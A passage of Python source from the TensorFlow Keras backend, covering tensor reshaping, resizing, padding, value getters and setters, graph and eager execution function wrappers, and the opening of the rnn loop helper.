shape: Target shape tuple.
Returns:
A tensor.
"""
return array_ops.reshape(x, shape)
@keras_export('keras.backend.permute_dimensions')
def permute_dimensions(x, pattern):
"""Permutes axes in a tensor.
Arguments:
x: Tensor or variable.
pattern: A tuple of
dimension indices, e.g. `(0, 2, 1)`.
Returns:
A tensor.
"""
return array_ops.transpose(x, perm=pattern)
@keras_export('keras.backend.resize_images')
def resize_images(x, height_factor, width_factor, data_format,
interpolation='nearest'):
"""Resizes the images contained in a 4D tensor.
Arguments:
x: Tensor or variable to resize.
height_factor: Positive integer.
width_factor: Positive integer.
data_format: One of `"channels_first"`, `"channels_last"`.
interpolation: A string, one of `nearest` or `bilinear`.
Returns:
A tensor.
Raises:
ValueError: in case of incorrect value for
`data_format` or `interpolation`.
"""
if data_format == 'channels_first':
rows, cols = 2, 3
elif data_format == 'channels_last':
rows, cols = 1, 2
else:
raise ValueError('Invalid `data_format` argument: %s' % (data_format,))
original_shape = int_shape(x)
new_shape = array_ops.shape(x)[rows:cols + 1]
new_shape *= constant_op.constant(
np.array([height_factor, width_factor], dtype='int32'))
if data_format == 'channels_first':
x = permute_dimensions(x, [0, 2, 3, 1])
if interpolation == 'nearest':
x = image_ops.resize_nearest_neighbor(x, new_shape)
elif interpolation == 'bilinear':
x = image_ops.resize_bilinear(x, new_shape)
else:
raise ValueError('interpolation should be one '
'of "nearest" or "bilinear".')
if data_format == 'channels_first':
x = permute_dimensions(x, [0, 3, 1, 2])
if original_shape[rows] is None:
new_height = None
else:
new_height = original_shape[rows] * height_factor
if original_shape[cols] is None:
new_width = None
else:
new_width = original_shape[cols] * width_factor
if data_format == 'channels_first':
output_shape = (None, None, new_height, new_width)
else:
output_shape = (None, new_height, new_width, None)
x.set_shape(output_shape)
return x
@keras_export('keras.backend.resize_volumes')
def resize_volumes(x, depth_factor, height_factor, width_factor, data_format):
"""Resizes the volume contained in a 5D tensor.
Arguments:
x: Tensor or variable to resize.
depth_factor: Positive integer.
height_factor: Positive integer.
width_factor: Positive integer.
data_format: One of `"channels_first"`, `"channels_last"`.
Returns:
A tensor.
Raises:
ValueError: if `data_format` is neither
`channels_last` or `channels_first`.
"""
if data_format == 'channels_first':
output = repeat_elements(x, depth_factor, axis=2)
output = repeat_elements(output, height_factor, axis=3)
output = repeat_elements(output, width_factor, axis=4)
return output
elif data_format == 'channels_last':
output = repeat_elements(x, depth_factor, axis=1)
output = repeat_elements(output, height_factor, axis=2)
output = repeat_elements(output, width_factor, axis=3)
return output
else:
raise ValueError('Invalid data_format: ' + str(data_format))
@keras_export('keras.backend.repeat_elements')
def repeat_elements(x, rep, axis):
"""Repeats the elements of a tensor along an axis, like `np.repeat`.
If `x` has shape `(s1, s2, s3)` and `axis` is `1`, the output
will have shape `(s1, s2 * rep, s3)`.
Arguments:
x: Tensor or variable.
rep: Python integer, number of times to repeat.
axis: Axis along which to repeat.
Returns:
A tensor.
"""
x_shape = x.shape.as_list()
# For static axis
if x_shape[axis] is not None:
# slices along the repeat axis
splits = array_ops.split(value=x,
num_or_size_splits=x_shape[axis],
axis=axis)
# repeat each slice the given number of reps
x_rep = [s for s in splits for _ in range(rep)]
return concatenate(x_rep, axis)
# Here we use tf.tile to mimic behavior of np.repeat so that
# we can handle dynamic shapes (that include None).
# To do that, we need an auxiliary axis to repeat elements along
# it and then merge them along the desired axis.
# Repeating
auxiliary_axis = axis + 1
x_shape = array_ops.shape(x)
x_rep = array_ops.expand_dims(x, axis=auxiliary_axis)
reps = np.ones(len(x.shape) + 1)
reps[auxiliary_axis] = rep
x_rep = array_ops.tile(x_rep, reps)
# Merging
reps = np.delete(reps, auxiliary_axis)
reps[axis] = rep
reps = array_ops.constant(reps, dtype='int32')
x_shape *= reps
x_rep = array_ops.reshape(x_rep, x_shape)
# Fix shape representation
x_shape = x.shape.as_list()
x_rep.set_shape(x_shape)
x_rep._keras_shape = tuple(x_shape)
return x_rep
@keras_export('keras.backend.repeat')
def repeat(x, n):
"""Repeats a 2D tensor.
if `x` has shape (samples, dim) and `n` is `2`,
the output will have shape `(samples, 2, dim)`.
Arguments:
x: Tensor or variable.
n: Python integer, number of times to repeat.
Returns:
A tensor.
"""
assert ndim(x) == 2
x = array_ops.expand_dims(x, 1)
pattern = array_ops.stack([1, n, 1])
return array_ops.tile(x, pattern)
@keras_export('keras.backend.arange')
def arange(start, stop=None, step=1, dtype='int32'):
"""Creates a 1D tensor containing a sequence of integers.
The function arguments use the same convention as
Theano's arange: if only one argument is provided,
it is in fact the "stop" argument and "start" is 0.
The default type of the returned tensor is `'int32'` to
match TensorFlow's default.
Arguments:
start: Start value.
stop: Stop value.
step: Difference between two successive values.
dtype: Integer dtype to use.
Returns:
An integer tensor.
"""
# Match the behavior of numpy and Theano by returning an empty sequence.
if stop is None and start < 0:
start = 0
result = math_ops.range(start, limit=stop, delta=step, name='arange')
if dtype != 'int32':
result = cast(result, dtype)
return result
@keras_export('keras.backend.tile')
def tile(x, n):
"""Creates a tensor by tiling `x` by `n`.
Arguments:
x: A tensor or variable
n: A list of integer. The length must be the same as the number of
dimensions in `x`.
Returns:
A tiled tensor.
"""
if isinstance(n, int):
n = [n]
return array_ops.tile(x, n)
@keras_export('keras.backend.flatten')
def flatten(x):
"""Flatten a tensor.
Arguments:
x: A tensor or variable.
Returns:
A tensor, reshaped into 1-D
"""
return array_ops.reshape(x, [-1])
@keras_export('keras.backend.batch_flatten')
def batch_flatten(x):
"""Turn a nD tensor into a 2D tensor with same 0th dimension.
In other words, it flattens each data samples of a batch.
Arguments:
x: A tensor or variable.
Returns:
A tensor.
"""
x = array_ops.reshape(x, array_ops.stack([-1, prod(shape(x)[1:])]))
return x
@keras_export('keras.backend.expand_dims')
def expand_dims(x, axis=-1):
"""Adds a 1-sized dimension at index "axis".
Arguments:
x: A tensor or variable.
axis: Position where to add a new axis.
Returns:
A tensor with expanded dimensions.
"""
return array_ops.expand_dims(x, axis)
@keras_export('keras.backend.squeeze')
def squeeze(x, axis):
"""Removes a 1-dimension from the tensor at index "axis".
Arguments:
x: A tensor or variable.
axis: Axis to drop.
Returns:
A tensor with the same data as `x` but reduced dimensions.
"""
return array_ops.squeeze(x, [axis])
@keras_export('keras.backend.temporal_padding')
def temporal_padding(x, padding=(1, 1)):
"""Pads the middle dimension of a 3D tensor.
Arguments:
x: Tensor or variable.
padding: Tuple of 2 integers, how many zeros to
add at the start and end of dim 1.
Returns:
A padded 3D tensor.
"""
assert len(padding) == 2
pattern = [[0, 0], [padding[0], padding[1]], [0, 0]]
return array_ops.pad(x, pattern)
@keras_export('keras.backend.spatial_2d_padding')
def spatial_2d_padding(x, padding=((1, 1), (1, 1)), data_format=None):
"""Pads the 2nd and 3rd dimensions of a 4D tensor.
Arguments:
x: Tensor or variable.
padding: Tuple of 2 tuples, padding pattern.
data_format: One of `channels_last` or `channels_first`.
Returns:
A padded 4D tensor.
Raises:
ValueError: if `data_format` is neither
`channels_last` or `channels_first`.
"""
assert len(padding) == 2
assert len(padding[0]) == 2
assert len(padding[1]) == 2
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
if data_format == 'channels_first':
pattern = [[0, 0], [0, 0], list(padding[0]), list(padding[1])]
else:
pattern = [[0, 0], list(padding[0]), list(padding[1]), [0, 0]]
return array_ops.pad(x, pattern)
@keras_export('keras.backend.spatial_3d_padding')
def spatial_3d_padding(x, padding=((1, 1), (1, 1), (1, 1)), data_format=None):
"""Pads 5D tensor with zeros along the depth, height, width dimensions.
Pads these dimensions with respectively
"padding[0]", "padding[1]" and "padding[2]" zeros left and right.
For 'channels_last' data_format,
the 2nd, 3rd and 4th dimension will be padded.
For 'channels_first' data_format,
the 3rd, 4th and 5th dimension will be padded.
Arguments:
x: Tensor or variable.
padding: Tuple of 3 tuples, padding pattern.
data_format: One of `channels_last` or `channels_first`.
Returns:
A padded 5D tensor.
Raises:
ValueError: if `data_format` is neither
`channels_last` or `channels_first`.
"""
assert len(padding) == 3
assert len(padding[0]) == 2
assert len(padding[1]) == 2
assert len(padding[2]) == 2
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
if data_format == 'channels_first':
pattern = [[0, 0], [0, 0], [padding[0][0], padding[0][1]],
[padding[1][0], padding[1][1]], [padding[2][0], padding[2][1]]]
else:
pattern = [[0, 0], [padding[0][0], padding[0][1]],
[padding[1][0], padding[1][1]], [padding[2][0],
padding[2][1]], [0, 0]]
return array_ops.pad(x, pattern)
@keras_export('keras.backend.stack')
def stack(x, axis=0):
"""Stacks a list of rank `R` tensors into a rank `R+1` tensor.
Arguments:
x: List of tensors.
axis: Axis along which to perform stacking.
Returns:
A tensor.
"""
return array_ops.stack(x, axis=axis)
@keras_export('keras.backend.one_hot')
def one_hot(indices, num_classes):
"""Computes the one-hot representation of an integer tensor.
Arguments:
indices: nD integer tensor of shape
`(batch_size, dim1, dim2, ... dim(n-1))`
num_classes: Integer, number of classes to consider.
Returns:
(n + 1)D one hot representation of the input
with shape `(batch_size, dim1, dim2, ... dim(n-1), num_classes)`
Returns:
The one-hot tensor.
"""
return array_ops.one_hot(indices, depth=num_classes, axis=-1)
@keras_export('keras.backend.reverse')
def reverse(x, axes):
"""Reverse a tensor along the specified axes.
Arguments:
x: Tensor to reverse.
axes: Integer or iterable of integers.
Axes to reverse.
Returns:
A tensor.
"""
if isinstance(axes, int):
axes = [axes]
return array_ops.reverse(x, axes)
# VALUE MANIPULATION
@keras_export('keras.backend.get_value')
def get_value(x):
"""Returns the value of a variable.
Arguments:
x: input variable.
Returns:
A Numpy array.
Raises:
RuntimeError: If this method is called inside defun.
"""
if context.executing_eagerly():
return x.numpy()
elif not getattr(x, '_in_graph_mode', True):
# This is a variable which was created in an eager context, but is being
# evaluated from a Graph.
with context.eager_mode():
return x.numpy()
elif ops.inside_function():
raise RuntimeError('Cannot get value inside Tensorflow graph function.')
return x.eval(session=get_session((x,)))
@keras_export('keras.backend.batch_get_value')
def batch_get_value(tensors):
"""Returns the value of more than one tensor variable.
Arguments:
tensors: list of ops to run.
Returns:
A list of Numpy arrays.
Raises:
RuntimeError: If this method is called inside defun.
"""
if context.executing_eagerly():
return [x.numpy() for x in tensors]
elif ops.inside_function(): # pylint: disable=protected-access
raise RuntimeError('Cannot get value inside Tensorflow graph function.')
if tensors:
return get_session(tensors).run(tensors)
else:
return []
@keras_export('keras.backend.set_value')
def set_value(x, value):
"""Sets the value of a variable, from a Numpy array.
Arguments:
x: Tensor to set to a new value.
value: Value to set the tensor to, as a Numpy array
(of the same shape).
"""
value = np.asarray(value, dtype=dtype(x))
if ops.executing_eagerly_outside_functions():
x.assign(value)
else:
with get_graph().as_default():
tf_dtype = dtypes_module.as_dtype(x.dtype.name.split('_')[0])
if hasattr(x, '_assign_placeholder'):
assign_placeholder = x._assign_placeholder
assign_op = x._assign_op
else:
assign_placeholder = array_ops.placeholder(tf_dtype, shape=value.shape)
assign_op = x.assign(assign_placeholder)
x._assign_placeholder = assign_placeholder
x._assign_op = assign_op
get_session().run(assign_op, feed_dict={assign_placeholder: value})
@keras_export('keras.backend.batch_set_value')
def batch_set_value(tuples):
"""Sets the values of many tensor variables at once.
Arguments:
tuples: a list of tuples `(tensor, value)`.
`value` should be a Numpy array.
"""
if ops.executing_eagerly_outside_functions():
for x, value in tuples:
x.assign(np.asarray(value, dtype=dtype(x)))
else:
with get_graph().as_default():
if tuples:
assign_ops = []
feed_dict = {}
for x, value in tuples:
value = np.asarray(value, dtype=dtype(x))
tf_dtype = dtypes_module.as_dtype(x.dtype.name.split('_')[0])
if hasattr(x, '_assign_placeholder'):
assign_placeholder = x._assign_placeholder
assign_op = x._assign_op
else:
assign_placeholder = array_ops.placeholder(tf_dtype,
shape=value.shape)
assign_op = x.assign(assign_placeholder)
x._assign_placeholder = assign_placeholder
x._assign_op = assign_op
assign_ops.append(assign_op)
feed_dict[assign_placeholder] = value
get_session().run(assign_ops, feed_dict=feed_dict)
@keras_export('keras.backend.print_tensor')
def print_tensor(x, message=''):
"""Prints `message` and the tensor value when evaluated.
Note that `print_tensor` returns a new tensor identical to `x`
which should be used in the following code. Otherwise the
print operation is not taken into account during evaluation.
Example:
```python
>>> x = K.print_tensor(x, message="x is: ")
```
Arguments:
x: Tensor to print.
message: Message to print jointly with the tensor.
Returns:
The same tensor `x`, unchanged.
"""
return logging_ops.Print(x, [x], message)
# GRAPH MANIPULATION
class GraphExecutionFunction(object):
"""Runs a computation graph.
It's possible to pass arguments to `tf.Session.run()` via `session_kwargs`.
In particular additional operations via `fetches` argument and additional
tensor substitutions via `feed_dict` arguments. Note that given
substitutions are merged with substitutions from `inputs`. Even though
`feed_dict` is passed once in the constructor (called in `model.compile()`)
we can modify the values in the dictionary. Through this feed_dict we can
provide additional substitutions besides Keras inputs.
Arguments:
inputs: Feed placeholders to the computation graph.
outputs: Output tensors to fetch.
updates: Additional update ops to be run at function call.
name: A name to help users identify what this function does.
session_kwargs: Arguments to `tf.Session.run()`:
`fetches`, `feed_dict`, `options`, `run_metadata`.
"""
def __init__(self, inputs, outputs, updates=None, name=None,
**session_kwargs):
updates = updates or []
if not isinstance(updates, (list, tuple)):
raise TypeError('`updates` in a Keras backend function '
'should be a list or tuple.')
self.inputs = nest.flatten(inputs)
self._outputs_structure = outputs
self.outputs = cast_variables_to_tensor(nest.flatten(outputs))
# TODO(b/127668432): Consider using autograph to generate these
# dependencies in call.
# Index 0 = total loss or model output for `predict`.
with ops.control_dependencies([self.outputs[0]]):
updates_ops = []
for update in updates:
if isinstance(update, tuple):
p, new_p = update
updates_ops.append(state_ops.assign(p, new_p))
else:
# assumed already an op
updates_ops.append(update)
self.updates_op = control_flow_ops.group(*updates_ops)
self.name = name
# additional tensor substitutions
self.feed_dict = session_kwargs.pop('feed_dict', None)
# additional operations
self.fetches = session_kwargs.pop('fetches', [])
if not isinstance(self.fetches, list):
self.fetches = [self.fetches]
self.run_options = session_kwargs.pop('options', None)
self.run_metadata = session_kwargs.pop('run_metadata', None)
# The main use case of `fetches` being passed to a model is the ability
# to run custom updates
# This requires us to wrap fetches in `identity` ops.
self.fetches = [array_ops.identity(x) for x in self.fetches]
self.session_kwargs = session_kwargs
# This mapping keeps track of the function that should receive the
# output from a fetch in `fetches`: { fetch: function(fetch_output) }
# A Callback can use this to register a function with access to the
# output values for a fetch it added.
self.fetch_callbacks = {}
if session_kwargs:
raise ValueError('Some keys in session_kwargs are not supported at this '
'time: %s' % (session_kwargs.keys(),))
self._callable_fn = None
self._feed_arrays = None
self._feed_symbols = None
self._symbol_vals = None
self._fetches = None
self._session = None
def _make_callable(self, feed_arrays, feed_symbols, symbol_vals, session):
"""Generates a callable that runs the graph.
Arguments:
feed_arrays: List of input tensors to be fed Numpy arrays at runtime.
feed_symbols: List of input tensors to be fed symbolic tensors at runtime.
symbol_vals: List of symbolic tensors to be fed to `feed_symbols`.
session: Session to use to generate the callable.
Returns:
Function that runs the graph according to the above options.
"""
# Prepare callable options.
callable_opts = config_pb2.CallableOptions()
# Handle external-data feed.
for x in feed_arrays:
callable_opts.feed.append(x.name)
if self.feed_dict:
for key in sorted(self.feed_dict.keys()):
callable_opts.feed.append(key.name)
# Handle symbolic feed.
for x, y in zip(feed_symbols, symbol_vals):
connection = callable_opts.tensor_connection.add()
if x.dtype != y.dtype:
y = math_ops.cast(y, dtype=x.dtype)
from_tensor = ops._as_graph_element(y)
if from_tensor is None:
from_tensor = y
connection.from_tensor = from_tensor.name # Data tensor
connection.to_tensor = x.name # Placeholder
# Handle fetches.
for x in self.outputs + self.fetches:
callable_opts.fetch.append(x.name)
# Handle updates.
callable_opts.target.append(self.updates_op.name)
# Handle run_options.
if self.run_options:
callable_opts.run_options.CopyFrom(self.run_options)
# Create callable.
callable_fn = session._make_callable_from_options(callable_opts)
# Cache parameters corresponding to the generated callable, so that
# we can detect future mismatches and refresh the callable.
self._callable_fn = callable_fn
self._feed_arrays = feed_arrays
self._feed_symbols = feed_symbols
self._symbol_vals = symbol_vals
self._fetches = list(self.fetches)
self._session = session
def _call_fetch_callbacks(self, fetches_output):
for fetch, output in zip(self._fetches, fetches_output):
if fetch in self.fetch_callbacks:
self.fetch_callbacks[fetch](output)
def __call__(self, inputs):
inputs = nest.flatten(inputs)
session = get_session(inputs)
feed_arrays = []
array_vals = []
feed_symbols = []
symbol_vals = []
for tensor, value in zip(self.inputs, inputs):
if value is None:
continue
if is_sparse(tensor):
sparse_coo = value.tocoo()
indices = np.concatenate((np.expand_dims(sparse_coo.row, 1),
np.expand_dims(sparse_coo.col, 1)), 1)
value = (indices, sparse_coo.data, sparse_coo.shape)
if tensor_util.is_tensor(value):
# Case: feeding symbolic tensor.
feed_symbols.append(tensor)
symbol_vals.append(value)
else:
# Case: feeding Numpy array.
feed_arrays.append(tensor)
# We need to do array conversion and type casting at this level, since
# `callable_fn` only supports exact matches.
tensor_type = dtypes_module.as_dtype(tensor.dtype)
array_vals.append(np.asarray(value,
dtype=tensor_type.as_numpy_dtype))
if self.feed_dict:
for key in sorted(self.feed_dict.keys()):
array_vals.append(
np.asarray(self.feed_dict[key], dtype=key.dtype.base_dtype.name))
# Refresh callable if anything has changed.
if (self._callable_fn is None or feed_arrays != self._feed_arrays or
symbol_vals != self._symbol_vals or
feed_symbols != self._feed_symbols or self.fetches != self._fetches or
session != self._session):
self._make_callable(feed_arrays, feed_symbols, symbol_vals, session)
fetched = self._callable_fn(*array_vals,
run_metadata=self.run_metadata)
self._call_fetch_callbacks(fetched[-len(self._fetches):])
return nest.pack_sequence_as(self._outputs_structure,
fetched[:len(self.outputs)])
class EagerExecutionFunction(object):
"""Helper class for constructing a TF graph function from the Keras graph.
Arguments:
inputs: Feed placeholders to the computation graph.
outputs: Output tensors to fetch.
updates: Additional update ops to be run at function call.
name: A name to help users identify what this function does.
session_kwargs: Unsupported.
"""
def __init__(self, inputs, outputs, updates=None, name=None):
self.name = name
self._outputs_structure = outputs
inputs = nest.flatten(inputs)
outputs = nest.flatten(outputs)
updates = updates or []
if not isinstance(updates, (list, tuple)):
raise TypeError('`updates` in a Keras backend function '
'should be a list or tuple.')
if updates and not outputs:
# Edge case; never happens in practice
raise ValueError('Cannot create a Keras backend function with updates'
' but no outputs during eager execution.')
graphs = {i.graph for i in nest.flatten([inputs, outputs, updates])
if hasattr(i, 'graph')}
if len(graphs) > 1:
raise ValueError('Cannot create an execution function which is comprised '
'of elements from multiple graphs.')
source_graph = graphs.pop()
global_graph = get_graph()
updates_ops = []
legacy_update_ops = []
for update in updates:
# For legacy reasons it is allowed to pass an update as a tuple
# `(variable, new_value)` (this maps to an assign op). Otherwise it
# is assumed to already be an op -- we cannot control its execution
# order.
if isinstance(update, tuple):
legacy_update_ops.append(update)
else:
if hasattr(update, 'op'):
update = update.op
updates_ops.append(update)
with _scratch_graph() as exec_graph:
global_graph = get_graph()
if source_graph not in (exec_graph, global_graph):
raise ValueError('Unknown graph. Aborting.')
if source_graph is global_graph and exec_graph is not global_graph:
init_tensors = (
outputs + updates_ops + [p for [p, _] in legacy_update_ops] +
[p_new for [_, p_new] in legacy_update_ops
if isinstance(p_new, ops.Tensor)])
lifted_map = lift_to_graph.lift_to_graph(
init_tensors=init_tensors, graph=exec_graph, sources=inputs,
add_sources=True, handle_captures=True, base_graph=source_graph)
inputs = [lifted_map[i] for i in inputs]
outputs = [lifted_map[i] for i in outputs]
updates_ops = [lifted_map[i] for i in updates_ops]
legacy_update_ops = [(lifted_map[p], lifted_map.get(p_new, p_new))
for p, p_new in legacy_update_ops]
# Consolidate updates
with exec_graph.as_default():
outputs = cast_variables_to_tensor(outputs)
with ops.control_dependencies(outputs):
for p, p_new in legacy_update_ops:
updates_ops.append(state_ops.assign(p, p_new))
self.inputs, self.outputs = inputs, outputs
with ops.control_dependencies(updates_ops):
self.outputs[0] = array_ops.identity(self.outputs[0])
exec_graph.inputs = self.inputs + list(exec_graph.captures.values())
exec_graph.outputs = self.outputs
graph_fn = eager_function.ConcreteFunction(exec_graph)
graph_fn._num_positional_args = len(self.inputs)
graph_fn._arg_keywords = []
self._graph_fn = graph_fn
# Handle placeholders with default
# (treated as required placeholder by graph functions)
self._placeholder_default_values = {}
with exec_graph.as_default():
for x in self.inputs:
if x.op.type == 'PlaceholderWithDefault':
self._placeholder_default_values[x] = tensor_util.constant_value(
x.op.inputs[0])
def __call__(self, inputs):
inputs = nest.flatten(inputs)
converted_inputs = []
for tensor, value in zip(self.inputs, inputs):
if value is None:
# Assume `value` is a placeholder with default
value = self._placeholder_default_values.get(tensor, None)
if value is None:
raise ValueError(
'You must feed a value for placeholder %s' % (tensor,))
if not isinstance(value, ops.Tensor):
value = ops.convert_to_tensor(value, dtype=tensor.dtype)
if value.dtype != tensor.dtype:
# Temporary workaround due to `convert_to_tensor` not casting floats.
# See b/119637405
value = math_ops.cast(value, tensor.dtype)
converted_inputs.append(value)
outputs = self._graph_fn(*converted_inputs)
return nest.pack_sequence_as(self._outputs_structure,
[x.numpy() for x in outputs])
@keras_export('keras.backend.function')
def function(inputs, outputs, updates=None, name=None, **kwargs):
"""Instantiates a Keras function.
Arguments:
inputs: List of placeholder tensors.
outputs: List of output tensors.
updates: List of update ops.
name: String, name of function.
**kwargs: Passed to `tf.Session.run`.
Returns:
Output values as Numpy arrays.
Raises:
ValueError: if invalid kwargs are passed in or if in eager execution.
"""
if ops.executing_eagerly_outside_functions():
if kwargs:
raise ValueError('Session keyword arguments are not support during '
'eager execution. You passed: %s' % (kwargs,))
return EagerExecutionFunction(inputs, outputs, updates=updates, name=name)
if kwargs:
for key in kwargs:
if (key not in tf_inspect.getfullargspec(session_module.Session.run)[0]
and key not in ['inputs', 'outputs', 'updates', 'name']):
msg = ('Invalid argument "%s" passed to K.function with TensorFlow '
'backend') % key
raise ValueError(msg)
return GraphExecutionFunction(inputs, outputs, updates=updates, **kwargs)
@keras_export('keras.backend.gradients')
def gradients(loss, variables):
"""Returns the gradients of `loss` w.r.t. `variables`.
Arguments:
loss: Scalar tensor to minimize.
variables: List of variables.
Returns:
A gradients tensor.
"""
return gradients_module.gradients(
loss, variables, colocate_gradients_with_ops=True)
@keras_export('keras.backend.stop_gradient')
def stop_gradient(variables):
"""Returns `variables` but with zero gradient w.r.t. every other variable.
Arguments:
variables: Tensor or list of tensors to consider constant with respect
to any other variable.
Returns:
A single tensor or a list of tensors (depending on the passed argument)
that has no gradient with respect to any other variable.
"""
if isinstance(variables, (list, tuple)):
return map(array_ops.stop_gradient, variables)
return array_ops.stop_gradient(variables)
# CONTROL FLOW
@keras_export('keras.backend.rnn')
def rnn(step_function,
inputs,
initial_states,
go_backwards=False,
mask=None,
constants=None,
unroll=False,
input_length=None,
time_major=False,
zero_output_for_mask=False):
"""Iterates over the time dimension of a tensor.
Arguments:
step_function: RNN step function.
Args;
input; Tensor with shape `(samples, ...)` (no time dimension),
representing input for the batch of samples at a certain
time step.
states; List of tensors.
Returns;
output; Tensor with shape `(samples, output_dim)`
(no time dimension).
new_states; List of tensors, same length and shapes
as 'states'. The first state in the list must be the
output tensor at the previous timestep.
inputs: Tensor of temporal data of shape `(samples, time, ...)`
(at least 3D), or nested tensors, and each of which has shape
`(samples, time, ...)`.
initial_states: Tensor with shape `(samples, state_size)`
(no time dimension), containing the initial values for the states used
in the step function. In the case that state_size is in a nested
shape, the shape of initial_states will also follow the nested
structure.
go_backwards: Boolean. If True, do the iteration over the time
dimension in reverse order and return the reversed sequence.
mask: Binary tensor with shape `(samples, time, 1)`,
with a zero for every element that is masked.
constants: List of constant values passed at each step.
unroll: Whether to unroll the RNN or to use a symbolic `while_loop`.
input_length: If specified, assume time dimension is of this length.
time_major: Boolean. If true, the inputs and outputs will be in shape
`(timesteps, batch, ...)`, whereas in the False case, it will be
`(batch, timesteps, ...)`. Using `time_major = True` is a bit more
efficient because it avoids transposes at the beginning and end of the
RNN calculation. However, most TensorFlow data is batch-major, so by
default this function accepts input and emits output in batch-major
form.
zero_output_for_mask: Boolean. If True, the output for masked timestep
will be zeros, whereas in the False case, output from previous
timestep is returned.
Returns:
A tuple, `(last_output, outputs, new_states)`.
last_output: the latest output of the rnn, of shape `(samples, ...)`
outputs: tensor with shape `(samples, time, ...)` where each
entry `outputs[s, t]` is the output of the step function
at time `t` for sample `s`.
new_states: list of tensors, latest states returned by
the step function, of shape `(samples, ...)`.
Raises:
ValueError: if input dimension is less than 3.
ValueError: if `unroll` is `True` but input timestep is not a fixed
number.
ValueError: if `mask` is provided (not `None`) but states is not provided
(`len(states)` == 0).
"""
def swap_batch_timestep(input_t):
# Swap the batch and timestep dim for the incoming tensor.
axes = list(range(len(input_t.shape)))
axes[0], axes[1] = 1, 0
return array_ops.transpose(input_t, axes)
if not time_major:
inputs = nest.map_structure(swap_batch_timestep, inputs)
flatted_inputs = nest.flatten(inputs)
time_steps = flatted_inputs[0].shape[0]
batch = flatted_inputs[0].shape[1]
time_steps_t = array_ops.shape(flatted_inputs[0])[0]
for input_ in flatted_inputs:
input_.shape.with_rank_at_least(3)
if mask is not None:
if mask.dtype != dtypes_module.bool:
mask = math_ops.cast(mask, dtypes_module.bool)
if len(mask.shape) == 2:
mask = expand_dims(mask)
if not time_major:
mask = swap_batch_timestep(mask)
if constants is None:
constants = []
# tf.where needs its condition tensor to be the same shape as its two
# result tensors, but in our case the condition (mask) tensor is
# (nsamples, 1), and inputs are (nsamples, ndimensions) or even more.
# So we need to broadcast the mask to match the shape of inputs.
# That's what the tile call does, it just repeats the mask along its
# second dimension n times.
def _expand_mask(mask_t, input_t, fixed_dim=1):
assert not nest.is_sequence(mask_t)
assert not nest.is_sequence(input_t)
rank_diff = len(input_t.shape) - len(mask_t.shape)
for _ in range(rank_diff):
mask_t = array_ops.expand_dims(mask_t, -1)
multiples = [1] * fixed_dim + input_t.shape.as_list()[fixed_dim:]
return array_ops.tile(mask_t, multiples)
if unroll:
if not time_steps:
raise ValueError('Unrolling requires a fixed number of timesteps.')
states = tuple(initial_states)
successive_states = []
successive_outputs = []
# Process the input tensors. The input tensor need to be split on the
# time_step dim, and reverse if go_backwards is True. In the case of nested
# input, the input is flattened and then transformed individually.
# The result of this will be a tuple of lists, each of the item in tuple is
# list of the tensor with shape (batch, feature)
def _process_single_input_t(input_t):
input_t = array_ops.unstack(input_t) # unstack for time_step dim
if go_backwards:
input_t.reverse()
return input_t
if nest.is_sequence(inputs):
processed_input = nest.map_structure(_process_single_input_t, inputs)
else:
processed_input = (_process_single_input_t(inputs),)
def _get_input_tensor(time):
inp = [t_[time] for t_ in processed_input]
return nest.pack_sequence_as(inputs, inp)
if mask is not None:
mask_list = array_ops.unstack(mask)
if go_backwards:
mask_list.reverse()
for i in range(time_steps):
inp = _get_input_tensor(i)
mask_t = mask_list[i]
output, new_states = step_function(inp,
tuple(states) + tuple(constants))
tiled_mask_t = _expand_mask(mask_t, output)
if not successive_outputs:
prev_output = zeros_like(output)
else:
prev_output = successive_outputs[-1]
output = array_ops.where(tiled_mask_t, output, prev_output)
return_states = []
for state, new_state in zip(states, new_states):
# (see earlier comment for tile explanation)
tiled_mask_t = _expand_mask(mask_t, new_state)
return_states.append(array_ops.where(tiled_mask_t, new_state, state))
states = return_states
successive_outputs.append(output)
successive_states.append(states)
last_output = successive_outputs[-1]
new_states = successive_states[-1]
outputs = array_ops.stack(successive_outputs)
if zero_output_for_mask:
last_output = array_ops.where(
_expand_mask(mask_list[-1], last_output),
last_output,
zeros_like(last_output))
outputs = array_ops.where(
_expand_mask(mask, outputs, fixed_dim=2),
outputs,
zeros_like(outputs))
else:
for i in range(time_steps):
inp = _get_input_tensor(i)
output, states = step_function(inp, tuple(states) + tuple(constants))
successive_outputs.append(output)
successive_states.append(states)
last_output = successive_outputs[-1]
new_states = successive_states[-1]
outputs = array_ops.stack(successive_outputs)
else:
states = tuple(initial_states)
# Create input tensor array, if the inputs is nested tensors, then it will
# be flattened first, and tensor array will be created one per flattened
# tensor.
input_ta = tuple(
tensor_array_ops.TensorArray(
dtype=inp.dtype,
size=time_steps_t,
tensor_array_name='input_ta_%s' % i)
for i, inp in enumerate(flatted_inputs))
input_ta = tuple(
ta.unstack(input_) if not go_backwards else ta
.unstack(reverse(input_, 0))
for ta, input_ in zip(input_ta, flatted_inputs))
# Get the time(0) input and compute the output for that, the output will be
# used to determine the dtype of output tensor array. Don't read from
# input_ta due to TensorArray clear_after_read default to True.
input_time_zero = nest.pack_sequence_as(inputs,
[inp[0] for inp in flatted_inputs])
# output_time_zero is used to determine the cell output shape and its dtype.
# the value is discarded.
output_time_zero, _ = step_function(input_time_zero,
initial_states + constants)
output_ta = tuple(
tensor_array_ops.TensorArray(
dtype=out.dtype,
size=time_steps_t,
tensor_array_name='output_ta_%s' % i)
for i, out in enumerate(nest.flatten(output_time_zero)))
time = constant_op.constant(0, dtype='int32', name='time')
while_loop_kwargs = {
'cond': lambda time, *_: time < time_steps_t,
'maximum_iterations': input_length,
'parallel_iterations': 32,
'swap_memory': True,
}
if mask is not None:
if not states:
raise ValueError('No initial states provided! '
'When using masking in an RNN, you should '
'provide initial states '
'(and your step function should return '
'as its first state at time `t` '
'the output at time `t-1`).')
if go_backwards:
mask = reverse(mask, 0)
mask_ta = tensor_array_ops.TensorArray(
dtype=dtypes_module.bool,
size=time_steps_t,
tensor_array_name='mask_ta')
mask_ta = mask_ta.unstack(mask)
# Mask for the T output will be base on the output of T - 1. In the case
# T = 0, a zero filled tensor will be used.
flat_zero_output = tuple(array_ops.zeros_like(o)
for o in nest.flatten(output_time_zero))
def _step(time, output_ta_t, prev_output, *states):
"""RNN step function.
Arguments:
